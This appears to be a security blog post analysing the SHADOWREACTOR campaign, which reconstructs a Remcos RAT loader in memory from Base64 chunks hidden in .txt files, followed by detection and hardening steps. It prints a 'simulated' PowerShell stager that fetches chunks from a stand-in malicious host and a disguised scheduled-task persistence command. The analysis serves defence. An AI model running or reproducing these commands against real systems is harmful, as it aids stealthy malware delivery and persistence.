Listen to this Post
Introduction:
A sophisticated malware campaign dubbed SHADOWREACTOR is leveraging a deceptively simple technique to bypass security filters: delivering malware hidden within plain-text `.txt` files. This method exploits the trust afforded to common file types and uses living-off-the-land tools like PowerShell to reconstruct and execute malicious payloads entirely in memory, leaving minimal forensic evidence. The campaign ultimately deploys the powerful Remcos Remote Access Trojan (RAT), giving attackers full control over compromised systems.
Learning Objectives:
- Understand the technical lifecycle of the SHADOWREACTOR campaign, from initial text file to RAT execution.
- Learn to identify indicators of compromise (IoCs) and commands for detecting in-memory payload reconstruction.
- Implement defensive strategies and hardening techniques to mitigate threats using similar “text-only” staging and living-off-the-land binaries (LOLBins).
You Should Know:
- The Attack Lifecycle: From Benign Text to Malicious Binary
The attack begins with the delivery of what appears to be harmless text files, such as `qpwoe32.txt` orconfig.txt. These files contain the malicious binary code for the next-stage loader, but it is encoded and split into chunks stored as text strings. This text-based delivery is highly effective at evading email gateways and network security solutions that often whitelist or perform only shallow inspection of `.txt` files.
Step-by-Step Guide:
Step 1: Delivery & Execution: The victim is tricked into opening a phishing email or downloading a document that initiates the process. A script (often a macro or a script within a document) is executed.
Step 2: Fetching & Reconstruction: The script calls PowerShell to fetch the chunked text files from a remote server. A PowerShell script then concatenates the text chunks and decodes them (often from Base64) back into a binary executable (.exe or .dll) directly in system memory, without writing the final file to disk.
Example PowerShell Reconstruction Command (Simulated Attacker Activity):
This mimics how an attacker might fetch and assemble a Base64-encoded payload from multiple text URLs $chunk1 = (Invoke-WebRequest -Uri "hxxp://malicious-server[.]com/config_part1.txt").Content $chunk2 = (Invoke-WebRequest -Uri "hxxp://malicious-server[.]com/config_part2.txt").Content $fullBase64 = $chunk1 + $chunk2 $binaryBytes = [System.Convert]::FromBase64String($fullBase64)
Step 3: In-Memory Loader Execution: The reconstructed binary, a .NET Reactor-protected loader, is executed via reflective loading techniques (e.g., Invoke-ReflectivePEInjection). This loader resides only in memory, making it hard for traditional antivirus to scan.
2. Evasion Core: .NET Reactor and Reflective Loading
The reconstructed binary is not the final payload but a protected loader. It is obfuscated with .NET Reactor, a commercial protector that encrypts code, embeds anti-debugging tricks, and confuses analysis tools. Its primary role is to stay hidden, decode the next stage, and inject it into a legitimate process.
Step-by-Step Guide:
Step 1: Loader Activation: The in-memory .NET binary is activated. It first performs environment checks to avoid sandboxes.
Step 2: Payload Decryption: It contains an encrypted blob—the final Remcos RAT payload. The loader uses a hard-coded decryption routine to reveal the RAT’s binary in memory.
Step 3: Process Hollowing/Injection: The loader then uses a technique like process hollowing. It may start a legitimate Windows process (e.g., explorer.exe) in a suspended state, hollows out its memory, and replaces it with the Remcos binary before resuming the thread. This masks Remcos as a trusted process.
Detection Command (Windows): Look for suspicious child processes of script hosts.
In a Security Information and Event Management (SIEM) or EDR query language, you might look for: Process: Parent Image = "C:\Windows\System32\wscript.exe" OR Parent Image = "\powershell.exe" Process: Child Image = "\temp\" OR Child Image CONTAINS "explorer" (with unusual command-line arguments)
- The Final Payload: In-Memory Deployment of Remcos RAT
The end goal is the stealthy execution of Remcos RAT, a full-featured remote access tool marketed as legitimate software but widely abused by threat actors. Its in-memory deployment is a critical evasion step.
Step-by-Step Guide:
Step 1: Execution: The hollowed process (e.g., explorer.exe) now executes the Remcos code from within its memory space.
Step 2: Persistence: Remcos establishes persistence via Registry Run keys or scheduled tasks.
Example Remcos persistence command (simulated): schtasks /create /tn "WindowsUpdateCheck" /tr "C:\Windows\System32\rundll32.exe C:\Users\%USERNAME%\AppData\Local\Temp\library.dll,Start" /sc hourly /mo 1 /f
Step 3: Command & Control (C2): It calls home to an attacker-controlled server, awaiting commands for keylogging, screen capture, file theft, and remote control.
4. Detection Strategies: Hunting for Text-Based Staging
Defense requires a focus on process behavior and network anomalies, not just file signatures.
Step-by-Step Guide:
Step 1: Enable Enhanced Logging: Ensure PowerShell script block logging and Module logging are enabled.
Group Policy or local configuration path: Administrative Templates -> Windows Components -> Windows PowerShell
Step 2: Hunt for LOLBin Sequences: Create detection rules for sequences like:
1. `mshta.exe` or `wscript.exe` spawning `powershell.exe`.
- That `powershell.exe` process making HTTP/HTTPS requests (to fetch .txt files).
- That `powershell.exe` process subsequently creating or injecting into a new, suspicious process.
Step 3: Network Traffic Analysis: Use firewalls or IDS/IPS to flag multiple small `.txt` file downloads by an endpoint tool like PowerShell, especially to newly registered or suspicious domains.
5. Mitigation and Hardening Recommendations
Proactive hardening can prevent successful exploitation.
Step-by-Step Guide:
Step 1: Restrict PowerShell: Use Constrained Language Mode and limit PowerShell execution to signed scripts in high-risk environments.
Check current session language mode $ExecutionContext.SessionState.LanguageMode
Step 2: Application Control: Deploy application allow-listing solutions like Windows Defender Application Control to block unauthorized binaries, including those attempting to run from memory or temp directories.
Step 3: Email & Web Filtering: Configure filters to inspect the content of `.txt` files for large blocks of Base64 or hex codes, not just the file extension. Treat all downloadable text files from the web with caution.
Step 4: Principle of Least Privilege: Ensure users operate with standard, non-administrative privileges to significantly hinder persistence mechanisms and system-wide exploitation.
What Undercode Say:
Evolution of Evasion: SHADOWREACTOR signifies a mature shift towards “content-agnostic delivery,” where the file extension is irrelevant. The malware is the text itself. This forces defenders to move beyond file-type-based filtering to deep content analysis and behavioral monitoring.
The Power of LOLBins: The campaign’s heavy reliance on PowerShell underscores the persistent security dilemma of powerful administrative tools. They are essential for IT management but are a primary attacker weapon. Effective defense now requires granular logging, behavioral analytics, and strict control over these trusted binaries.
The technical analysis of SHADOWREACTOR reveals a blueprint for modern intrusion: bypass perimeter security with trusted formats, leverage pre-installed system tools for execution, and employ multiple layers of obfuscation to protect the payload. The lack of a traditional malware binary on disk challenges traditional antivirus paradigms, pushing the industry further towards endpoint detection and response (EDR) solutions focused on process lineage and anomalous behavior. This campaign is not about a novel vulnerability, but about the clever, persistent misuse of standard system features.
Prediction:
The “text-only” staging technique will be rapidly adopted by other malware families and initial access brokers due to its high success rate against static defenses. We will see an increase in campaigns using chunked payloads hidden in various plain-text or configuration file formats (e.g., .json, .yml, .csv). Furthermore, the use of protectors like .NET Reactor will become standard for loaders, increasing the time and cost of analysis. This will accelerate the integration of AI/ML models in security products to detect anomalous scripting sequences and subtle memory injection patterns, moving the primary battleground from the network perimeter to the endpoint’s memory and process behavior. Defenders must prioritize visibility into PowerShell, WMI, and MSHTA activity across their networks.
▶️ Related Video (80% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Jamie Williams – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
